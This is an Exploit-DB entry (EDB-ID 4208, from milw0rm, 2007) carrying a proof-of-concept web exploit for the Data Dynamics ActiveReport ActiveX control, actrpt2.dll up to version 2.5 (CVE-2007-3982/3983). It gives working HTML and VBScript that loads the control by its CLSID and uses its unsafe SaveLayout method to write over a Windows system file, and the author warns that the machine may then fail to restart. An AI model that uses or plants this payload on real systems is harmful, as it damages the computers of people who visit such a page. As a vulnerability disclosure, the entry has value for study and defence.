Data Dynamics ActiveReport ActiveX actrpt2.dll <= 2.5 Inscure Method

2007-07-21T00:00:00
ID EDB-ID:4208
Type exploitdb
Reporter shinnai
Modified 2007-07-21T00:00:00

Description

Data Dynamics ActiveReport ActiveX (actrpt2.dll <= 2.5) Inscure Method. CVE-2007-3982,CVE-2007-3983. Remote exploit for windows platform

                                        
                                            &lt;pre&gt;
&lt;code&gt;&lt;span style="font: 10pt Courier New;"&gt;&lt;span class="general1-symbol"&gt;-----------------------------------------------------------------------------------------------
 &lt;b&gt;Data Dynamics ActiveReport ActiveX Control (actrpt2.dll &lt;= 2.5) "SaveLayout()" Inscure Method&lt;/b&gt;
 url: http://www.datadynamics.com/default.aspx

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 &lt;b&gt;&lt;font color="#FF0000"&gt;THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!&lt;/font&gt;&lt;/b&gt;

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 &lt;b&gt;This control is marked as:
 RegKey Safe for Script: True
 RegKey Safe for Init: True
 Implements IObjectSafety: False
 KillBitSet: False&lt;/b&gt;
-----------------------------------------------------------------------------------------------

&lt;object classid='clsid:9EB8768B-CDFA-44DF-8F3E-857A8405E1DB' id='test'&gt;&lt;/object&gt;

&lt;input language=VBScript onclick=tryMe() type=button value="Click here to start the test"&gt;

&lt;script language='vbscript'&gt;
 Sub tryMe
    test.SaveLayout "c:\windows\system_.ini", 1
    MyMsg = MsgBox("Ok, now check your system.ini file")
 End Sub
&lt;/script&gt;
&lt;/span&gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

# milw0rm.com [2007-07-21]